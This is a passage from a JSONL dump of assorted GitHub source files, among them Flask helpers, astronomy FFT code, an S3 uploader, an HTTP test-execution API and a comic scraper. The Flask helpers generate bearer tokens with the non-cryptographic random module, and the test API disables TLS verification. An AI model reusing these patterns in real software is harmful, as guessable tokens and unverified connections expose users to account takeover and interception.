str(user_request.status_code)[0] in ('4', '5'):\n abort(user_request.status_code, user_request.reason)\n try:\n return user_request.json()\n except ValueError:\n abort(500, 'Unable to parse signon json')\n\n\ndef to_error_list(form_errors):\n def format_error(error):\n return '{0}'.format(error)\n\n messages = []\n for field_name, field_errors in form_errors.items():\n messages.append('; '.join(map(format_error, field_errors)))\n return 'You have errors in your form: ' + '; '.join(messages) + '.'\n\n\n@app.template_filter('format_status')\ndef format_status(s):\n return s.title().replace('-', ' ')\n\n\ndef generate_bearer_token():\n return ''.join(random.choice(string.lowercase + string.digits)\n for i in range(64))\n\n\ndef redirect_if_module_exists(module_name):\n def wrap(func):\n @wraps(func)\n def check_and_redirect(*args, **kwargs):\n admin_client = kwargs['admin_client']\n uuid = kwargs['uuid']\n dashboard_dict = admin_client.get_dashboard(uuid)\n if \"modules\" in dashboard_dict.keys():\n data_types = [module[\"data_type\"]\n for module in dashboard_dict[\"modules\"]\n if 'data_type' in module]\n if module_name in data_types:\n flash(\"Module already exists\", 'info')\n return redirect(url_for(\n 'dashboard_hub', uuid=uuid))\n return func(*args, **kwargs)\n return check_and_redirect\n return wrap\n\n\ndef user_has_feature(feature, user):\n if not user:\n return False\n roles = app.config.get('ROLES')\n user_role_definitions = filter(\n lambda definition: definition['role'] in user['permissions'], roles)\n user_role_features = map(\n lambda definition: definition['features'], user_role_definitions)\n if len(user_role_features) == 0:\n return False\n return feature in set(reduce(\n lambda item, memo: memo + item, user_role_features))\n","repo_name":"alphagov/performanceplatform-admin","sub_path":"application/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":6759,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23381618508","text":"from heapq import heapify, heappop\n\n\ndef get_kth_element(arr: list, k: int) -> int: # O(NlogN)\n \"\"\"\n Ищет k-ый по порядку элемент массива.\n\n :param arr: изначальный массив,\n :param k: порядковая статистика,\n :return: число, соответствующее k-ой статистике.\n \"\"\"\n heapify(arr)\n el = None\n\n for i in range(k + 1):\n el = heappop(arr)\n\n return el\n\n\ndef solution():\n arr = list(map(int, input().split()))\n k = int(input())\n print(get_kth_element(arr, k))\n\n\nif __name__ == '__main__':\n solution()\n","repo_name":"angelinagnedina/AAA-academy","sub_path":"Algorithms_class/module_5_k-th_order_statistic.py","file_name":"module_5_k-th_order_statistic.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26466193157","text":"# sklep internetowy\r\n# użyj klasy produkt\r\n# zrób klase koszyk, do którego można wrzucić produkty\r\n# na koniec niech koszyk powie jaka jest jego sumaryczna wartosc\r\nfrom collections import defaultdict\r\n\r\n\r\nclass Produkt():\r\n def __init__(self, id, nazwa, cena):\r\n self.id = id\r\n self.nazwa = nazwa\r\n self.cena = cena\r\n self.kolor = \"biały\"\r\n\r\n def wypisz_info(self):\r\n return f'ID: {self.id}, \"{self.nazwa}\", cena: {self.cena:.2f} PLN'\r\n\r\nclass Koszyk():\r\n def __init__(self):\r\n self._pudelko = defaultdict() # po wpisaniu defaultdict() podkreśli się na czerwono, wtedy robimy\r\n # lewy Alt+Enter i na samej górze pojawi się \"from collections import defaultdict\r\n\r\n def dodaj(self, prod, ile):\r\n if prod in self._pudelko:\r\n self._pudelko[prod] += ile # już był produkt w pudełku\r\n else:\r\n self._pudelko[prod] = ile # wrzucamy pierwszy raz\r\n\r\n def podlicz_sie(self):\r\n\r\n wynik = 0\r\n for prod in self._pudelko:\r\n wynik += self._pudelko[prod] * prod.cena\r\n\r\n sum(x.cena * self._pudelko[x] for x in self._pudelko) # to jest wyrażenie listowe\r\n return wynik\r\n\r\nzakupy = Koszyk()\r\nprod1 = Produkt(1,'jabłko',3)\r\nzakupy.dodaj(prod1, 10)\r\nprod2 = Produkt(2,'gruszka',10)\r\nzakupy.dodaj(prod2, 6)\r\nzakupy.dodaj(prod1, 10)\r\n\r\n\r\nprint(zakupy.podlicz_sie()) # ==> 120\r\n\r\n\r\n\"\"\"\r\nMoje notatki: tak tworzymy słownik i sprawdzamy, czy coś w nim jest:\r\nsl = dict()\r\nsl['klucz'] = 3\r\nsl\r\n{'klucz': 3}\r\n'ala' in sl\r\nFalse\r\n\"\"\"\r\n","repo_name":"PatrycjaHomosapiens/Python","sub_path":"Obiekty_Zad_5_moje_defaultdict.py","file_name":"Obiekty_Zad_5_moje_defaultdict.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5639322762","text":"\"\"\"\n\nThis is the main program for the SPOC Catcher.\n\nA problem with this is that PDO uses Python 2.7 and we're using 3.7\n\nAside from having division issues everything is fine?\n\n\nThink about TVOI database\n\n\nmay want to move detection threshold out of the catcher\n\n\n\"\"\"\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport time\nimport glob\nimport pickle\nimport numpy as np\nimport pandas as pd\nfrom scipy import signal as scipy_signal\nfrom scipy import stats\nimport matplotlib.pyplot as plt\n#from skimage.measure.tests.test_simple_metrics import cam\n#plt.rcParams.update({'figure.max_open_warning': 0})\n\nfrom matplotlib.gridspec import GridSpec,GridSpecFromSubplotSpec\n\nfrom scipy.signal import find_peaks\n\nDIR = os.path.abspath(os.path.dirname(__file__))\nsys.path.insert(0, os.path.join(DIR, '../..'))\n\nimport src.util.configurable as config\nimport src.util.gaia_query as gaia\nimport src.main.Lightcurve_io3 as LC_io\n\nimport src.main.FFT_Analysis as FFT\nimport src.main.LC_Analysis as LCA\nimport src.main.Period_Analysis as PA\nfrom src.util.common_filepaths import return_all_sector_datapath,return_interested_target_datapath\nfrom src.util.common_algorithm import segment_array,pad_array_index\nfrom src.util.star_query import get_star_info,get_exofop_nearby\n\nuser_input = config.Configuration(\"../../input/configs/user_input_test.cfg\")\n\n\nclass General_Catcher():\n \n def __init__(self):\n pass\n\nclass SPOC_Catcher():\n\n def __init__(self,filename,savepath,sector=0,Norm=0,detrending=721,manual_cut=[]):\n \n self.filename = filename\n self.sector = sector\n self.Normalization = Norm\n self.savepath = savepath\n self.detrending = detrending\n self.manual_cut = manual_cut\n \n # here are regions that \"just works\"\n # eventually I want to optimize this for physical objects\n self.min = 0\n self.slow = 0\n self.low = 6\n self.mid = 48\n self.high = 96\n self.max = 360\n \n self.slow_thres = 12\n self.low_thres = 12\n self.mid_thres = 12\n self.high_thres = 13\n \n self.bump_frequency = True\n self.freq_catch_cut = 1 # truncate frequency smaller than 1\n self.Outlier_Multiplier = 0.15\n\n def Load_Lightcurve_Data(self):\n\n self.TVOI = LC_io.SPOC_TVOI(self.filename,self.savepath,self.sector,self.Normalization,self.manual_cut)\n self.TVOI.load_object_data(self.detrending)\n\n def Detection_Threshold(self,amplitude,rms_thres,local_pt,method,offset=0,prevmean=\"0\"):\n\n if method == \"Local Mean\":\n \n outlier = int(local_pt*self.Outlier_Multiplier)\n seg_array = segment_array(amplitude,local_pt)\n \n bin_mean = np.sum(seg_array,1)/local_pt\n bin_rms = np.array([np.sqrt(np.sum((np.sort(local_data)[outlier:-outlier]-local_mean)**2)/(local_pt-2*outlier)) for local_mean,local_data in zip(bin_mean,seg_array)])\n bin_thres = bin_mean + bin_rms*rms_thres\n \n plot_mean = (np.ones((np.shape(seg_array)[0],local_pt))*np.array(bin_mean).reshape((-1,1))).reshape(-1)[:len(amplitude)]\n plot_thres = (np.ones((np.shape(seg_array)[0],local_pt))*np.array(bin_thres).reshape((-1,1))).reshape(-1)[:len(amplitude)] \n\n elif method == \"Slope Mean\":\n \n outlier = int(local_pt*self.Outlier_Multiplier)\n \n low_amp_trim = np.sort(amplitude[:local_pt*2])[outlier:-outlier]\n low_mean = np.mean(low_amp_trim)\n low_rms = np.sqrt(np.sum((low_amp_trim-low_mean)**2)/len(low_amp_trim))\n low_thres = low_mean + low_rms*rms_thres\n \n high_amp_trim = np.sort(amplitude[-local_pt*2:])[outlier:-outlier]\n high_mean = np.mean(high_amp_trim)\n high_rms = np.sqrt(np.sum((high_amp_trim-high_mean)**2)/len(high_amp_trim))\n high_thres = high_mean + high_rms*rms_thres\n \n plot_mean = np.linspace(low_mean,high_mean,len(amplitude)+1)[:-1]\n plot_thres = np.linspace(low_thres,high_thres,len(amplitude)+1)[:-1]\n\n \n elif method == \"Global Mean\":\n \n outlier = int(len(amplitude)*self.Outlier_Multiplier)\n amplitude_trim = np.sort(amplitude)[outlier:-outlier]\n \n global_mean = np.mean(amplitude_trim)\n global_rms = np.sqrt(np.sum((amplitude_trim-global_mean)**2)/len(amplitude_trim))\n global_thres = global_mean + global_rms*rms_thres\n \n plot_mean = np.ones(len(amplitude))*global_mean\n plot_thres = np.ones(len(amplitude))*global_thres\n \n elif method == \"Boxcar Mean\":\n \n Total_pt = len(amplitude)\n plot_mean = np.zeros(Total_pt)\n plot_rms = np.zeros(Total_pt)\n \n for i in range(Total_pt):\n \n head = int(i - (local_pt)/2)+offset\n tail = int(i + (local_pt)/2)+offset\n \n if head < 0:\n head = 0\n if tail > len(self.amplitude):\n tail = Total_pt+offset\n local_data = self.amplitude[head:tail]\n outlier = int(len(local_data)*self.Outlier_Multiplier)\n local_mean = np.mean(local_data) \n local_rms = np.sqrt(np.sum((np.sort(local_data)[outlier:-outlier]-local_mean)**2/(local_pt-outlier*2)))# for local_mean,local_data in zip(local_mean,seg_array)])\n plot_mean[i] = local_mean\n plot_rms[i] = local_rms\n \n \n plot_thres = plot_mean+plot_rms*rms_thres\n \n else:\n pass\n \n return plot_mean, plot_thres\n \n def Conduct_FFT_Analysis(self):\n \n self.N1 = FFT.guess_N(len(self.TVOI.time_bin),8,False)\n # TVOI.signal_bin_detrended is reserved for visualization and data folding purpose\n self.extended_time, self.extended_signal = LCA.extend_lightcurve(self.TVOI.signal_bin_cleaned,self.N1,self.Normalization)\n\n FFT_Result = FFT.compute_fft_general(self.extended_signal, self.TVOI.time_step, self.N1) \n self.freq,self.sig,self.amplitude,self.power = FFT_Result\n\n\n # I want to catch things that are: \n # 0.33-4 (3day-6hr), 4-24(6-1hr),24-96 (1hr - 15min), 96-360(15-4min)\n # slow,low,mid,high\n # consider testing a second detrending after the initial slow oscillations are caught\n \n local_pt = 2**8\n \n self.total_bin_num = len(self.freq)\n self.slow_start_bin = int(self.total_bin_num*self.slow/self.max)\n self.low_start_bin = int(self.total_bin_num*self.low/self.max)\n self.mid_start_bin = int(self.total_bin_num*self.mid/self.max)\n self.high_start_bin = int(self.total_bin_num*self.high/self.max)\n \n self.slow_end_bin = pad_array_index(self.slow_start_bin,self.low_start_bin,local_pt)\n self.low_end_bin = pad_array_index(self.low_start_bin,self.mid_start_bin,local_pt)\n self.mid_end_bin = pad_array_index(self.mid_start_bin,self.high_start_bin,local_pt)\n self.high_end_bin = self.total_bin_num # this gets special treatment because it's the end of the array, need to pad start index\n self.high_start_bin = pad_array_index(self.mid_end_bin,self.high_end_bin,local_pt,reverse=True)\n \n self.slow_mean, self.slow_thres = self.Detection_Threshold(self.amplitude[self.slow_start_bin:self.slow_end_bin],\n self.slow_thres,local_pt*2,\"Boxcar Mean\",offset=self.slow_start_bin,prevmean=True) \n self.low_mean, self.low_thres = self.Detection_Threshold(self.amplitude[self.low_start_bin:self.low_end_bin],\n self.low_thres,local_pt, \"Boxcar Mean\",offset=self.low_start_bin)\n self.mid_mean, self.mid_thres = self.Detection_Threshold(self.amplitude[self.mid_start_bin:self.mid_end_bin],\n self.mid_thres,local_pt,\"Boxcar Mean\",offset=self.mid_start_bin)\n self.high_mean, self.high_thres = self.Detection_Threshold(self.amplitude[self.high_start_bin:self.high_end_bin],\n self.high_thres,local_pt,\"Local Mean\")\n \n #boxcar mean very powerful for some case and not others....\n # I need a way to use multiple detection methods and \n # figure out a way to combine their results in future iteration of development\n # also need to calculate the amplitude of the FFT peaks\n \n self.slow_peaks,_ = find_peaks(self.amplitude[self.slow_start_bin:self.slow_end_bin],self.slow_thres)\n self.low_peaks,_ = find_peaks(self.amplitude[self.low_start_bin:self.low_end_bin],self.low_thres)\n self.mid_peaks,_ = find_peaks(self.amplitude[self.mid_start_bin:self.mid_end_bin],self.mid_thres)\n self.high_peaks,_ = find_peaks(self.amplitude[self.high_start_bin:self.high_end_bin],self.high_thres)\n \n \n self.num_slow_peaks = len(self.slow_peaks)\n self.num_low_peaks = len(self.low_peaks)\n self.num_mid_peaks = len(self.mid_peaks)\n self.num_high_peaks = len(self.high_peaks)\n \n \n self.peak_index = list(set(list(self.slow_peaks+self.slow_start_bin)+\n list(self.low_peaks+self.low_start_bin)+\n list(self.mid_peaks+self.mid_start_bin)+\n list(self.high_peaks+self.high_start_bin)))\n \n self.num_peaks = len(self.peak_index)\n \n if self.num_peaks < 1:\n # future iterations should still generate simpler diagnostic plots for objects without anything found\n # this proves to be useful when someone raise certain objects to consideration \n # also good for checking if the code id performing well\n # I will need a list of \"should catch\" and a list of \"should not catch\" for testing purpose\n # print(\"No FFT Peak Found\")\n self.period_flag = False\n self.should_generate = False\n self.sorted_peaks = []\n return 0\n \n \n peaks = list(zip(self.amplitude[self.peak_index],self.peak_index))\n dtype = [('power', float), ('index', int)]\n self.sorted_peaks = np.sort(np.array(peaks, dtype=dtype), order='power')[::-1][:3]\n \n \n \n # Trying to refine peak detection and find principle folding frequency\n \n self.N2 = FFT.guess_N(len(self.TVOI.time_bin),128,True)\n extended_time1, extended_signal1 = LCA.extend_lightcurve(self.TVOI.signal_bin_cleaned,self.N2,self.Normalization)\n FFT_Result = FFT.compute_fft_general(extended_signal1, self.TVOI.time_step, self.N2) \n freq1,sig1,amplitude1,power1 = FFT_Result\n \n total_bin_num1 = len(freq1)\n \n low_threshold = int(total_bin_num1*self.slow/360) # filter everything longer than 2 day\n high_threshold = int(total_bin_num1*24/360) # filter everything shorter than 1 hr\n \n #target_freq = freq1[low_threshold:high_threshold]\n #target_amp = amplitude1[low_threshold:high_threshold]\n \n predict_frequency = 1\n peak_frequencies = []\n new_peak_indexs = []\n check_param = 128 # get the amplitude of the function \n for incident_peak in self.sorted_peaks:\n \n incident_peak_index = incident_peak[1]\n potential_peak_index = int(incident_peak_index*self.N2/self.N1)\n \n if potential_peak_index > high_threshold-check_param or potential_peak_index < low_threshold+check_param:\n continue\n \n rel_new_peak_index,_ = find_peaks(amplitude1[potential_peak_index-check_param:potential_peak_index+check_param],\n amplitude1[potential_peak_index-check_param])\n \n new_peak_index = rel_new_peak_index[0]+potential_peak_index-check_param\n \n frequency = freq1[new_peak_index]\n peak_frequencies.append(frequency)\n new_peak_indexs.append(new_peak_index)\n \n \n \n pfi = np.array(new_peak_indexs)\n self.period_flag = False\n if len(pfi) != 0 and self.bump_frequency:\n try: # magic that I can't understand... presumably check if harmonic is present?\n pfi_index = [i for i, x in enumerate(pfi[1:]-int(pfi[0]/2) < 0.01*pfi[0]) if x][0]+1\n self.predict_frequency = peak_frequencies[pfi_index]\n self.period_flag = True\n except:\n pfi_index = pfi[0]\n self.predict_frequency = peak_frequencies[0]\n else:\n self.predict_frequency = self.freq[self.sorted_peaks[0][1]]\n \n \n #self.predict_frequency = peak_frequencies[1]\n # FFT amplitude doesn't matter?\n predict_frequency_amplitude = 0\n #print(self.predict_frequency) \n \n # truncate any period longer than 1 days\n if self.predict_frequency < self.freq_catch_cut:\n self.should_generate = False\n return 0\n else:\n self.should_generate = True \n return 1 \n","repo_name":"zhuchangzhan/TVOI","sub_path":"src/main/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":13567,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"32956907540","text":"# 로또 생성하시오 \n# 1~45랜덤 6개 출력\n# import random\n# alist = []\n# for i in range(6):\n# rnd = random.randint(1, 46)\n# alist.append(rnd)\n# print(alist)\n \nfrom dask.array.random import random\n\narr45 = [1,2,3,4,5 ,6,7,8,9,10]\n# arr45 = range(1, 45+1)\nfor i in range(100):\n rnd = int (random() * len(arr45))\n #print(\"rnd값\",rnd)\n a= arr45[0]\n b= arr45[rnd]\n arr45[0]=b\n arr45[rnd]=a\nprint(arr45[0:6])\n","repo_name":"JAEGyEOng69/Python","sub_path":"workspace_python/HELLO_PYTHON/day02/mytest03.py","file_name":"mytest03.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18649975715","text":"# 32.Complete the function that takes a non-negative integer n as input, and returns a list of\n# all the powers of 2 with the exponent ranging from 0 to n (inclusive).\n# n=0 == >[1] #[2^0]\n# n = 1 ==> [1, 2] # [2^0, 2^1]\n# n = 2 ==> [1, 2, 4] # [2^0, 2^1, 2^2].\n\ndef powers(n):\n a=[]\n for i in range(0,n+1):\n a.append(2**i)\n print(a)\nnum=int(input(\"enter a number\"))\npowers(num) ","repo_name":"shanti96/function","sub_path":"32 .the powers of 2 with the exponent ranging.py","file_name":"32 .the powers of 2 with the exponent ranging.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3097630433","text":"\nimport boto3\nfrom botocore.exceptions import ClientError\nimport logging\nlogging.basicConfig(level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\nimport os\n\n\ndef upload_file(file_name, bucket, object_name=None):\n \"\"\"Upload a file to an S3 bucket\n\n :param file_name: File to upload\n :param bucket: Bucket to upload to\n :param object_name: S3 object name. If not specified then file_name is used\n :return: True if file was uploaded, else False\n \"\"\"\n\n # If S3 object_name was not specified, use file_name\n if object_name is None:\n object_name = file_name\n\n # Upload the file\n s3_client = boto3.client('s3')\n try:\n response = s3_client.upload_file(file_name, bucket, object_name)\n except ClientError as e:\n logging.error(e)\n return False\n return True\n\nlogging.info(\"Starting uploading gaceta in s3 bucket\")\ngaceta_list = os.listdir('gacetas')\n\nfor gaceta in gaceta_list:\n logging.info(\"uploading file: \"+gaceta)\n path = \"gacetas/\"+gaceta\n file_uploaded = upload_file(path, 'gacetas', object_name=gaceta)\n if file_uploaded:\n logging.info(\"file \"+gaceta+\" uploaded!\")\n print(\"-\"*20)\n else:\n logging.warning(\"file \"+gaceta+\" worng loaded\")\n\nlogging.info(\"Loaded Finished\")","repo_name":"Luisehica/ETL-Gacetas","sub_path":"Load_to_s3.py","file_name":"Load_to_s3.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3863427806","text":"import time\nimport multiprocessing\nfrom contextlib import contextmanager\n\n# See https://www.microprediction.com/blog/robust-optimization for explanation\n\n\nclass WorkerQueue:\n\n def __init__(self,num_workers):\n self.queue = multiprocessing.Manager().Queue()\n _ = [ self.queue.put(i) for i in range(num_workers)]\n\n @contextmanager\n def next_available(self):\n current_idx = self.queue.get()\n yield current_idx\n self.queue.put(current_idx)\n\n\nclass Parallel:\n\n \"\"\" Turn f(worker, *args, **kwargs) into g(*args, **kwargs)\n So if you need to call g() a lot, write a version with one pre-pended argument then do g = Parallel(f)\n \"\"\"\n\n def __init__(self, func, num_workers):\n self.queue = WorkerQueue(num_workers=num_workers)\n self.func = func\n\n def __call__(self, *args, **kwargs):\n with self.queue.next_available() as worker:\n return self.func(worker,*args,**kwargs)\n\n\n# Usage example....\nif __name__=='__main__':\n start_time = time.time()\n\n def boss(i, x):\n print('Gonna send '+str(x)+' to server '+str(i))\n time.sleep(5)\n return x\n\n task = Parallel(boss, num_workers=5)\n\n from multiprocessing import Pool\n with Pool(5) as p:\n print( p.map(task,[1,3,4,2,3,1,7,3,2,1,4,1] ) )\n\n print(\"Time take: \"+str(time.time()-start_time))","repo_name":"microprediction/embarrassingly","sub_path":"embarrassingly/parallel.py","file_name":"parallel.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"13532196959","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/8/30 9:15 下午\n# @Author : ShaHeTop-Almighty-ares\n# @Email : yang6333yyx@126.com\n# @File : case_exec_api.py\n# @Software: PyCharm\n\nfrom concurrent.futures import ThreadPoolExecutor\n\nfrom all_reference import *\nfrom app.models.test_case.models import TestCase\nfrom app.models.test_env.models import TestEnv\nfrom app.models.test_logs.models import TestLogs\nfrom app.models.test_case_scenario.models import TestCaseScenario\nfrom common.libs.StringIOLog import StringIOLog\n\nexecutor = ThreadPoolExecutor(10)\n\n\nclass CaseReqTestApi(MethodView):\n \"\"\"\n test send\n \"\"\"\n\n def post(self):\n data = request.get_json()\n method = data.get('method')\n base_url = data.get('base_url')\n url = data.get('url')\n headers = data.get('headers', {})\n req_type = data.get('req_type')\n body = data.get('body', {})\n\n send = {\n \"url\": base_url + url if base_url else url,\n \"headers\": headers,\n req_type: body\n }\n\n if req_type not in [\"params\", \"data\", \"json\"]:\n return api_result(code=400, message='req_type 应该为:{}'.format([\"params\", \"data\", \"json\"]))\n\n try:\n if hasattr(requests, method):\n response = getattr(requests, method)(**send, verify=False)\n data = {\n \"response\": response.json(),\n \"response_headers\": dict(response.headers)\n }\n return api_result(code=200, message='操作成功', data=data)\n else:\n return api_result(code=400, message='请求方式:{}不存在'.format(method))\n except BaseException as e:\n return api_result(code=400, message='请求方式失败:{}'.format(str(e)))\n\n\nclass CaseExecApi(MethodView):\n \"\"\"\n 用例执行Api\n GET:\n POST: 用例执行\n PUT:\n DELETE:\n \"\"\"\n\n def post(self):\n \"\"\"\n 用例执行\n\n 用例执行\n {\n \"execute_id\": 14,\n \"execute_type\": \"case\",\n \"data_driven\": False\n \"base_url_id\": 1\n }\n\n 场景执行\n {\n \"execute_id\": 3,\n \"execute_type\": \"scenario\",\n \"data_driven\": false\n \"base_url_id\": 1\n }\n :return:\n \"\"\"\n execute_type_em = (\"case\", \"scenario\")\n data = request.get_json()\n execute_id = data.get('execute_id')\n execute_type = data.get('execute_type')\n data_driven = data.get('data_driven', False)\n base_url_id = data.get('base_url_id', None)\n\n send_test_case_list = []\n\n query_base_url = TestEnv.query.get(base_url_id)\n\n if not query_base_url:\n return api_result(code=400, message='base_url_id:{}不存在'.format(base_url_id))\n\n if execute_type not in execute_type_em:\n return api_result(code=400, message='execute_type:{}不存在'.format(execute_type))\n\n if execute_type == \"case\":\n result = query_case_zip(case_id=execute_id)\n if not result:\n return api_result(code=400, message='用例id:{}不存在'.format(execute_id))\n\n TestCase.query.get(execute_id).add_total_execution()\n send_test_case_list = [result]\n\n if execute_type == \"scenario\":\n result = TestCaseScenario.query.get(execute_id)\n if not result:\n return api_result(code=400, message='场景id:{}不存在'.format(execute_id))\n\n case_list = result.to_json().get('case_list')\n\n if not case_list: # 防止手动修改数据导致,在场景创建的接口中有对应的校验\n return api_result(code=400, message='场景id:{}用例为空'.format(execute_id))\n\n send_test_case_list = []\n for case_id in case_list:\n result = query_case_zip(case_id=case_id)\n if not result:\n return api_result(code=400, message='场景中,用例id:{}不存在'.format(case_id))\n send_test_case_list.append(result)\n\n update_case = TestCase.query.filter(TestCase.id.in_(case_list)).all()\n for u in update_case:\n u.add_total_execution()\n\n sio = StringIOLog()\n test_obj = {\n \"base_url\": query_base_url.env_url,\n \"execute_type\": execute_type,\n \"case_list\": send_test_case_list,\n \"data_driven\": data_driven,\n \"sio\": sio\n }\n main_test = MainTest(test_obj=test_obj)\n executor.submit(main_test.main)\n tl = TestLogs(\n log_type=execute_type,\n creator=g.app_user.username,\n creator_id=g.app_user.id\n )\n tl.save()\n return api_result(code=200, message='操作成功,请前往日志查看执行结果', data=[id(sio)])\n","repo_name":"chentuqin/ExileTestPlatformServer","sub_path":"app/api/case_exec_api/case_exec_api.py","file_name":"case_exec_api.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23386148534","text":"import os\nfrom django.conf import settings\n\"\"\"\nThis file contains constants for various things in the app.\nDONT STRING MATCH\nput stuff in here and import to other files.\nAlso dont import things into here, circular dependencies == bad\n\"\"\"\n\nSTATE_CHOICES = [\n (\"FL\", \"Florida\"),\n]\n\nCOUNTRY_CHOICES = [\n (\"US\", \"United States of America! YEAH!\"),\n]\n\nSESSION_VARS = {\n 'gatorlink': 'gatorlink',\n 'email': 'email',\n 'first_name': 'first_name',\n 'last_name': 'last_name',\n 'previous_log_id': 'previous_log_id',\n 'timeout_time': 1217\n}\n\nQI_CHECK = {\n 'no': 0,\n 'yes': 1,\n 'no_program': 2,\n}\n\nADDRESS_TYPE= {\n 'business': 'business',\n 'organization': 'organization',\n}\n\nanswer_submit_names = {\n 'question_id': 'question_id',\n 'choice_id': 'choice_id',\n 'project_id': 'project_id',\n}\n\nanswer_response_names = {\n 'user_id': 'user_id',\n 'question_id': 'question_id',\n 'choice_id': 'choice_id',\n 'project_id': 'project_id',\n 'response_id': 'response_id',\n 'newly_created': 'newly_created',\n}\n\nanswer_submit_names = {\n 'question_id': 'question_id',\n 'choice_id': 'choice_id',\n 'project_id': 'project_id',\n}\n\nprojects_per_page = 25\n\nusers_per_page = 25\n\nsimilarity_factors = {\n 'big_aim': 10,\n 'category': 10,\n 'clinical_setting': 10,\n 'clinical_area': 10,\n 'description': 25,\n 'keyword': 25,\n 'title': 10,\n}\n\napi_username = 'admin_api_user'\n\nfixture_username = 'admin_fixture_user'\n\ngatorlink_header = 'Glid'\n\nbridge_key = os.environ['QIPR_SHARED_BRIDGE_KEY']\n\nprotocol = 'http://' if (os.environ['DJANGO_CONFIGURATION'] == 'development') else 'https://'\n\nregistry_host = protocol + os.environ['QIPR_APPROVER_REGISTRY_HOST']\n\nregistry_port = os.environ['QIPR_APPROVER_REGISTRY_PORT']\n\nregistry_path = os.environ['QIPR_APPROVER_REGISTRY_PATH']\n\nregistry_hostport = registry_host + (':' + registry_port if registry_port else '')\n\nregistry_hostportpath = registry_hostport + ( registry_path if registry_path else '')\n\nregistry_search_path = registry_hostportpath + '/search'\n\nregistry_endpoints = {\n 'add_model': '/'.join([registry_hostportpath, 'api', 'add_model']),\n}\n\nemail_url = protocol + os.environ['QIPR_APPROVER_APPROVER_HOST']\n\nbase_url = protocol + os.environ['QIPR_APPROVER_APPROVER_HOST'] + os.environ['QIPR_APPROVER_APPROVER_PATH']\n\napp_label = 'approver'\n\ntotal_qualifiers_2017 = 80\n\nSHIB_ENABLED = os.getenv('SHIB_ENABLED', 'true')\n\nemail_from_address = settings.QIPR_EMAIL_RETURN_ADDR\n\ninvalid_email_characters = [\n '\"',\n ' ',\n]\n\n# Internet explorer 8 is bad\nbad_user_agent_strings = [\n 'MSIE 8.0',\n]\n\nis_staging = True if os.environ['IS_STAGING'] == 'true' else False\n\nVERSION_NUMBER = '1.4.0'\n","repo_name":"ctsit/qipr_approver","sub_path":"qipr_approver/approver/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"6092434373","text":"#!/usr/bin/env python\n# coding: utf-8\n\n### scrapnąć wszystkie komiksy garfielda ze strony mirrora. >> 01.iv.23 vB\n# http://pt.jikos.cz/garfield/\n\n\nimport urllib.request\nfrom bs4 import BeautifulSoup as bs\nimport requests\nimport re\nfrom time import sleep\n\n \n\ndef getHTMLdocument(url):\n # function to extract html document from given url\n # request for HTML document of given url\n response = requests.get(url)\n return response.text\n\ndef get_linki_lat(url):\n # zwraca liste urli poszczególnych roczników garfielda\n lista_ul = []\n html_document = getHTMLdocument(url)\n soup = bs(html_document, 'html.parser')\n for link in soup.find_all('a', #znajdź wszystkie pola rocznik \", rocznik)\n for miesiac in range(1,13):\n print(\"-> mc \", miesiac, end=\".. \")\n obrazky = get_linki_obrazow(rocznik+str(miesiac)+\"/\")\n #print(obrazky)\n sleep(9) #opcja odciążenia serwera przez dodanie dodatkowej przerwy między pobraniami \n for obrazek in obrazky:\n print(\".\", end=\"\") #kropka postępu pobierania\n get_obrazek(sciezka,obrazek)\n #sleep(1) #opcja odciążenia serwera przez dodanie 1 sekundowej przerwy między pobraniami \n i+=1\n print()\n print(i, \"# \\n\")\nprint(\"\\n fin as of\", i, \" files.\")\n\n\n","repo_name":"pjogi-testy/scraping-garfield","sub_path":"garfield_cartoon_scrape_script.py","file_name":"garfield_cartoon_scrape_script.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23176785835","text":"from typing import Dict, List, Union\n\nfrom backend.resources.networks.common.formatter import NetworkFormatter\nfrom backend.utils.basic import getitems\n\n\nclass IngressFormatter(NetworkFormatter):\n \"\"\" Ingress 格式化 \"\"\"\n\n def parse_hosts(self, resource_dict: Dict) -> List:\n \"\"\" 解析 Ingress hosts \"\"\"\n rules = getitems(resource_dict, 'spec.rules', [])\n return [r.get('host') for r in rules]\n\n def parse_addresses(self, resource_dict: Dict) -> List:\n \"\"\" 解析 Ingress address \"\"\"\n addresses = []\n for ingress in getitems(resource_dict, 'status.loadBalancer.ingress', []):\n if ingress.get('ip'):\n addresses.append(ingress['ip'])\n elif ingress.get('hostname'):\n addresses.append(ingress['hostname'])\n return addresses\n\n def parse_default_ports(self, resource_dict: Dict) -> Union[str, int]:\n \"\"\"\n 解析 Ingress 默认 port\n 默认是 HTTP 端口,如果有TLS配置则为 HTTP + HTTPS 端口\n \"\"\"\n return '80, 443' if 'tls' in resource_dict['spec'] else '80'\n\n def format_dict(self, resource_dict: Dict) -> Dict:\n res = 